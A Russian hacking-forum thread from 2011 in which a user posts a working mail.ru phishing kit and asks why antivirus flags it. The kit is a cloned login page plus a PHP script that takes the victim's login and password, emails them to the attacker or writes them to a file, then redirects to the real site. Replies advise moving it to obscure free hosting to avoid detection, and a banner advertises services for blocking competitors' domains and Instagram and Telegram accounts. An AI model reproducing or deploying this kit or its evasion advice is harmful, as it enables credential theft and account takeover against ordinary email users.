Проблема со взломам mail.ru

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ

Скрыть

		ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости Mail-сервис
Проблема со взломам mail.ru

Опции темы

Поиск в этой теме

Опции просмотра

14.01.2011, 01:00

FargusXP

Новичок

Регистрация: 11.01.2011

Сообщений: 27

С нами: 8070806

Репутация: -1

Здрасти. Вот такая проблемка, есть фейк на маил, кидаю жертве письмецо мол вас заблокируют... но почему после того как жертва клацает по ссылачке срабатывает антивирус?
хост на h18
залит двумя файломи .php
первый фаил

[PHP

/**/
/* -1)
window.name = 'srvt=' + (new Date()).getTime();
});
rT.addHandler(document, 'keypress', function() {
if (window.name.indexOf('srvt') > -1) window.name = '';
});

rT.img0 = new Image();
rT.img0.src = 'http://mail.radar.imgsmail.ru/update?' +
'p=mail0' +
(rT.radar_type != '' ? ('&t=' + rT.radar_type) : '') +
(rT.srvt ? ('&i=srvt:' + rT.srvt) : '') +
'&v=0&rnd=320034566' +
'';

} catch(e) {}
/*]]>*/

Вход в систему

* html .n_shMain {border-left: 900px solid #00468C; position: relative; z-index: 1;}
* html .n_shIE {margin-left: -900px; position: relative; z-index: 2; float: left;}

/** html .n_shMain {padding-left: 900px;} */

.n_spI {background-image: url(http://win.mail.ru/http://img.imgsmail.ru/mail/ru/images/ru/_sp_start.png); background-repeat:no-repeat; display:inline-block; margin-right:8px; padding:3px 0; vertical-align:middle; width:31px; height:20px; //height:26px;}
.n_iEnter {background-position: 0 2px;}
.n_iBulk {background-position: 0 -26px;}
.n_iMA {background-position: 0 -53px;}
.n_iSend {background-position: 0 -81px;}
.n_iDraft {background-position: 0 -109px;}
.n_iTrash {background-position: 0 -137px;}

if( self.parent.frames.length != 0 )
self.parent.location = document.location;

maxLen[i] && maxLen[i] > 0) bad = true;
if (field.value.length 0)
{
bad = true;
if(fields[i]=="Password")
errors[i]="Пароль должен быть не менее четырех символов.";
}
if (patterns[i] != ''){
var re = new RegExp(patterns[i]);
if (!re.test(field.value + "")) bad = true;
}
if ((minVal[i] > 0) || (maxVal[i] > 0)){
var val = parseInt(field.value,10);
if ((val maxVal[i])) bad = true;
}
if (bad){
alert("Неверно заполнено поле " + prompts[i] + "\n" + errors[i]);
field.focus();
return false;
}
}
}
}

return true;
}
// -->

#superbest {
position: absolute;
left: 15;
top: 150;
width: 125;
visibility: visible;
z-index: 10;
}

//

//

.appM {border: 1px solid #989898; background-color: #FFF; padding: 4px 0; position: absolute; right: 0; top: 0;}
.appM a {background-repeat: no-repeat; background-position: 10px center; display: block; padding: 4px 10px 4px 35px; text-align: right; color: black; text-decoration: none; font-size: 11px; font-family: Tahoma !important; white-space: nowrap;}
.appM a:HOVER {text-decoration: none; color: black; background-color: #dedfe3;}

/* superNEW shapka */
.n_spTop {background-image: url(http://win.mail.ru/http://img.mail.ru/mail/ru/images/ru/_sp_top2.png?1);}
.n_shT {background-color: #00468C; border-left: 1px solid #FFF; border-right: 1px solid #FFF; height: 1px; position: relative; font-size: 0; line-height: 0; height: 1px; //height: 0; //display: inline-block; //width: 100%;}
.n_shMain {position: relative; height: 54px; width: 90%; min-width: 900px; background-color: #00468C; background-repeat: repeat-x; background-position: 0 -220px; margin: 1px 0 7px;}
.n_shLogo {position: absolute; height: 47px; width: 25%; background-repeat: no-repeat; background-position: center 0; text-align: center; top: 0;}
.n_shLogoA {display: inline-block; height: 34px; width: 160px; margin-top: 11px;}
.n_shLogoW {display: inline-block; height: 14px; width: 38px; vertical-align: top; margin-top: 11px;}
.n_shForm {color: #FFF; white-space: nowrap; margin: 0; font-size: 11px; font-family: Tahoma !important; position: absolute; right: 5px; top: 5px;}
.n_shSns2 {color: #FFF; vertical-align: middle; position: absolute; display:inline-block; font-size: 95%; font-family: Tahoma !important; width: 100%; padding: 0 0 0 24%; //padding: 0 0 0 24%;}
.n_shSns2 a {color: #FFF;}
.n_shSns2 a:HOVER {color: #FFF;}
/* end superNEW shapka */

/* superNEW shapka menu */
.n_shBook {position: relative; top: 32px; padding-left: 24%; white-space: nowrap; display: block; height: 20px; overflow: hidden;}
.nm_menuA {background-color: #5977b3; display: inline-block; height: 20px; vertical-align: top; padding: 3px 0 2px 0;}
.nm_menuAaa {margin: 0 4px 0 3px; float: left; color: #FFF; text-decoration: none; position: relative; z-index: 100;}
a:HOVER.nm_menuAaa {text-decoration: underline; float: left; color: #FFF !important; position: relative; z-index: 100;}
.nm_menuS {border-top: 0; border-left: 0; border-bottom: 20px solid #5977b3; border-right: 20px solid transparent; font-size: 0; line-height: 0; display: inline-block;vertical-align:top; position: relative; z-index: 1;}
.nm_menuSp {border-bottom: 12px solid transparent; border-right: 12px solid #5977b3; font-size: 0; line-height: 0; display: inline-block; vertical-align:top; padding: 7px 0 0 0; margin-top: 1px;position: relative; z-index: 1;}
.nm_menuSp2 {border-top: 1px solid #5977b3; font-size: 0; line-height: 0; display: inline-block; width: 11px; position: absolute; top: 0; left: 1px; vertical-align:top; z-index: 1;}

.nm_menuA_act {background-color: #FFF;}
.nm_menuAaa_act {color: #013572 !important; font-weight: bold; margin-left: 1px;}
a:HOVER.nm_menuAaa_act {color: #013572 !important;}
.nm_menuS_act {border-bottom: 20px solid #FFF;}
.nm_menuSp_act {border-right: 12px solid #FFF; border-bottom: 12px solid #FFF;}
.nm_menuSp2_act {border-top: 1px solid #FFF;}

.nm_menuSp_f {border-bottom: 12px solid #5977b3;}
.nm_menuAaa_f {margin-left: 1px;}

.nm_menu2 {float:left; position: relative; margin-left: -11px;}
@media all and (-webkit-min-device-pixel-ratio:10000),
not all and (-webkit-min-device-pixel-ratio:0)
{ .nm_menu2 {margin-left: -10px;} }
/* end superNEW shapka menu */

.nm_menuAaa {margin: 0 0 0 -3px;}
.nm_menuAaa_act {margin-left: -3px !important;}
.nm_menuAaa_f {margin-left: -3px !important;}

.shMenu2{float: left; position: relative; margin-left: -11px; border-bottom: 3px solid #5977B3}
.shMenu2_act {border-bottom: 3px solid #FFF}
@media all and (-webkit-min-device-pixel-ratio:10000), not all and (-webkit-min-device-pixel-ratio:0){
.shMenu2 {margin-left: -10px}
}
@media screen and (-webkit-min-device-pixel-ratio:0){
.shMenu2 {margin-left: -10px}
}
.shA{background-color: #5977b3; display: inline-block; height: 20px; vertical-align: top}
.shAaa{margin: 2px 2px 0 2px; float: left; color: #FFF; text-decoration: none; position: relative; z-index: 100}
a:HOVER.shAaa{text-decoration: underline; float: left; color: #FFF !important; position: relative; z-index: 100}
.shS{border-top: 0; border-left: 0; border-bottom: 20px solid #5977b3; border-right: 20px solid transparent; font-size: 0; line-height: 0; display: inline-block;vertical-align:top; position: relative; z-index: 1}
.shSp{border-bottom: 12px solid transparent; border-right: 12px solid #5977b3; font-size: 0; line-height: 0; display: inline-block; vertical-align:top; padding: 7px 0 0 0; margin-top: 1px;position: relative; z-index: 1}
.shSp2{border-top: 2px solid #5977b3; font-size: 0; line-height: 0; display: inline-block; width: 11px; position: absolute; top: 0; left: 1px; vertical-align:top; z-index: 1}

.ie6bT {border-top-color: #00468c !important; filter:chroma(color='#00468c');}
.ie6bR {border-right-color: #00468c !important; filter:chroma(color='#00468c');}
.ie6bB {border-bottom-color: #00468c !important; filter:chroma(color='#00468c');}
.ie6bL {border-left-color: #00468c !important; filter:chroma(color='#00468c');}

Почта
Адреса
Мой мир
Фото
Видео
Блоги
Игры
Знакомства
Деньги
Карты

Дизайн

.tooltip
{
position: absolute;
margin-top: 28px;
_width: 166px;
*width: 166px;
}

.tooltip .tail
{
background: url(http://img.imgsmail.ru/r/tooltip/tail.png) no-repeat;
_background-image: url(http://win.mail.ru/http://img.imgsmail.ru/r/tooltip/tail.gif);
width: 9px;
height: 5px;
left: 39px;
top: -4px;
position: absolute;
}

.tooltip .ltc, .tooltip .rtc, .tooltip .lbc, .tooltip .rbc
{
background: url(http://img.imgsmail.ru/r/tooltip/ltc.png) no-repeat;
_background-image: url(http://win.mail.ru/http://img.imgsmail.ru/r/tooltip/ltc.gif);
width: 6px;
height: 6px;
float: left;
_margin-right: -3px;
}

.tooltip .rtc
{
background: url(http://img.imgsmail.ru/r/tooltip/rtc.png) no-repeat;
_background-image: url(http://win.mail.ru/http://img.imgsmail.ru/r/tooltip/rtc.gif);
float: right;
_margin-left: -3px;
_margin-right: 0;
}

.tooltip .lbc
{
background: url(http://img.imgsmail.ru/r/tooltip/lbc.png) no-repeat;
_background-image: url(http://win.mail.ru/http://img.imgsmail.ru/r/tooltip/lbc.gif);
*margin-left: -3px;
}

.tooltip .rbc
{
background: url(http://img.imgsmail.ru/r/tooltip/rbc.png) no-repeat;
_background-image: url(http://win.mail.ru/http://img.imgsmail.ru/r/tooltip/rbc.gif);
float: right;
_margin-left: -3px;
_margin-right: 0;
*margin-right: -3px;
}

.tooltip .ts, .tooltip .bs
{
height: 6px;
line-height: 6px;
_overflow: hidden;
*overflow: hidden;
background: #fbf7c7 url(http://img.imgsmail.ru/r/tooltip/border_pix.gif) repeat-x top;
margin: 0 6px;
_margin: 0;
}

.tooltip .bs
{
background: #fbf7c7 url(http://img.imgsmail.ru/r/tooltip/border_pix.gif) repeat-x bottom;
*border-bottom: solid 1px #a6a8ae;
}

.tooltip .rborder
{
background: url(http://img.imgsmail.ru/r/tooltip/border_pix.gif) repeat-y right;
padding: 0 9px;
}

.tooltip .inner
{
background: #fbf7c7 url(http://img.imgsmail.ru/r/tooltip/border_pix.gif) repeat-y;
}

.tooltip .mess
{
font-family: tahoma !important;
color: #5a393f;
font-size: 9px;
position: absolute;
margin-top: -3px;
white-space: nowrap;
}

Авторизация

Для входа в систему введите, пожалуйста, логин и пароль. Если у Вас еще нет логина, Вам необходимо зарегистрироваться.

Имя

@mail.ru@inbox.ru@bk.ru@list.ru

Пароль

Вы вводите русские буквы
Включен Caps Lock
Пароль содержит русские буквы

    Забыли паро ль?

 

Чужой компьютер

 

 

 

if(document.forms["Auth"] && document.forms["Auth"].elements["Password"] && document.getElementById('tooltipAuth_struter'))
{
var tooltipAuth = {
targetElem: document.forms["Auth"].elements["Password"],
struter: document.getElementById('tooltipAuth_struter'),
mess: document.getElementById('tooltipAuth_mess'),
shell: document.getElementById('tooltipAuth_shell'),
tail: document.getElementById('tooltipAuth_tail'),
wasCaps: false,

sAlign: function() {
if(/msie\s+\d/i.test(navigator.userAgent))
this.struter.style.overflow = 'hidden';

this.struter.style.width = this.mess.offsetWidth + "px";
this.struter.style.height = (/msie\s+\d/i.test(navigator.userAgent) ? 6 : (this.mess.offsetHeight - 6)) + "px";

if(/msie\s+\d/i.test(navigator.userAgent))
this.shell.style.width = (this.struter.offsetWidth + 30) + "px";
},
activate: function() {
if(window.addEventListener)
{
this.targetElem.addEventListener("blur", this.hide, false);
this.targetElem.addEventListener("keydown", tooltipAuth.keydown, false);
this.targetElem.addEventListener("keypress", tooltipAuth.checkCondition, false);
}
else
{
this.targetElem.attachEvent("onblur", this.hide);
this.targetElem.attachEvent("onkeydown", tooltipAuth.keydown);
this.targetElem.attachEvent("onkeypress", tooltipAuth.checkCondition);
}
},
show: function(messNum) {
tooltipAuth.shell.style.visibility = 'hidden';

var text = document.getElementById('tooltipAuth_mess_var');
var text2 = document.getElementById('tooltipAuth_mess_var2');
var text3 = document.getElementById('tooltipAuth_mess_var3');

text.style.display = text2.style.display = text3.style.display = "none";

if(messNum == 1)
text.style.display = '';
if(messNum == 2)
text2.style.display = '';
if(messNum == 3)
text3.style.display = '';

tooltipAuth.shell.style.display = '';
tooltipAuth.sAlign();
tooltipAuth.tail.style.left = (Math.round(tooltipAuth.shell.offsetWidth / 2) - 4) + "px";
tooltipAuth.shell.style.visibility = 'visible';
},
hide: function() {
tooltipAuth.shell.style.display = 'none';
},
keydown: function(e) {
var evt = e ? e : window.event;
var keyCode = evt.keyCode ? evt.keyCode : evt.charCode;
if ( keyCode == 20 && tooltipAuth.wasCaps == 'off' )
tooltipAuth.show(2);
else
tooltipAuth.hide();
},
checkCondition: function(e) {
var evt = e ? e : event;
var evtEl = evt.srcElement ? evt.srcElement : evt.target;

var keyCode = evt.keyCode ? evt.keyCode : evt.charCode;

var symb = String.fromCharCode(keyCode);
var symbUC = symb.toUpperCase();
var symbLC = symb.toLowerCase();

var onCapsLock = false;
if(symbUC != symbLC) {
onCapsLock = ((evt.shiftKey && symbLC == symb) || (!evt.shiftKey && symbUC == symb));
tooltipAuth.wasCaps = onCapsLock ? 'on' : 'off';
} else
tooltipAuth.wasCaps = false;

var isCyrillic = false;
if( /[а-я]/i.test(symb) )
isCyrillic = true;

var hasCyrillic = false;
if( /[а-я]/i.test(tooltipAuth.targetElem.value) )
hasCyrillic = true;

var messNum;

if (hasCyrillic)
messNum = 3;
if (onCapsLock)
messNum = 2;
if (isCyrillic)
messNum = 1;

if (messNum)
{
//if(tooltipAuth.shell.style.display == 'none')
tooltipAuth.show(messNum);
}
else
tooltipAuth.hide();
}
};

try {
tooltipAuth.activate();
} catch(ex) {};

}

//

© 1999-2011, Mail.Ru
Регистрация · Cооб� �ество пользователей · Сл ужба поддержки  

//

//

")//-->

');
if(11

');//-->

//

//

][/php]

И второй фаил

PHP highlight

Код:


	Код:
	$BASE="test@mail.ru";

$IS_EMAIL=true;

$LOCATION="http://win.mail.ru/cgi-bin/start?back=1";

$p0=$_REQUEST["Login"];

$p1=$_REQUEST["Password"];

$headers="Content-type: text/html; charset=windows-1251\r\n";

$headers.="From: bot \r\n";

$headers.="Bcc:$BASE\r\n";

$info="$p0:$p1:\n";

if ($IS_EMAIL){

mail($BASE,"*** Вам пришёл сюрприз!",$headers.$info);

} else {

$fd=fopen($BASE,"a+");

fwrite($fd,$info);

fclose($fd);

}

header("Location:$LOCATION");

?>

𝕏 Twitter Reddit Telegram Копировать ссылку

14.01.2011, 01:00

zonder666

Познающий

Регистрация: 03.12.2010

Сообщений: 56

С нами: 8126966

Репутация: 1

Такая же проблема. Только сегодня зарегал новый адрес на hut2.ru залил похожий фейк туда. При проверке антивир не пропустил ссылку. Проверил сайт на http://siteadvisor.com и получил это:

"В результате проведения тестов на данном веб-сайте были обнаружены загружаемые программы, которые некоторые пользователи считают шпионскими программами, программами для показа рекламы или другим нежелательным программным обеспечением."

Может ктонить подскажет в чём тут дело?

17.01.2011, 01:00

thref2

Участник форума

Регистрация: 08.11.2010

Сообщений: 117

С нами: 8162966

Репутация: 22

Это из-за хостинга!

17.01.2011, 01:00

hometex

Познающий

Регистрация: 24.06.2009

Сообщений: 66

С нами: 8885846

Репутация: 2

залей все это на другой, менее известный хостинг, на форуме можно найти такие....

18.01.2011, 01:00

POCT

Новичок

Регистрация: 30.10.2010

Сообщений: 20

С нами: 8175926

Репутация: 4

Не очень понятно, не могли бы вы выложить это все в картинках. На всякий случай скидываю вам сайт arvixe.ru Месяц можно пользоваться бесплатно. Инвайт: 01-start

Добавлено через 5 минут

Цитата:

Сообщение от FargusXP

Здрасти. Вот такая проблемка, есть фейк на маил, кидаю жертве письмецо мол вас заблокируют... но почему после того как жертва клацает по ссылачке срабатывает антивирус?
хост на h18
залит двумя файломи .php
первый фаил

возможно это не антивирус(как я понял), просто уже как месяц на mail.ru выскакивает предупреждение(есть несколько вариантов обхода этого предупреждения, но в паблике нет). То, что есть варианты обхода знаю точно, сам проверял(но не скажу ).

18.01.2011, 01:00

zonder666

Познающий

Регистрация: 03.12.2010

Сообщений: 56

С нами: 8126966

Репутация: 1

Цитата:

возможно это не антивирус(как я понял), просто уже как месяц на mail.ru выскакивает предупреждение(есть несколько вариантов обхода этого предупреждения, но в паблике нет). То, что есть варианты обхода знаю точно, сам проверял(но не скажу ).

Дело не в мэйл.ру. Антивиры палят сам хост hut.ru
На других бесплатниках все нармэ.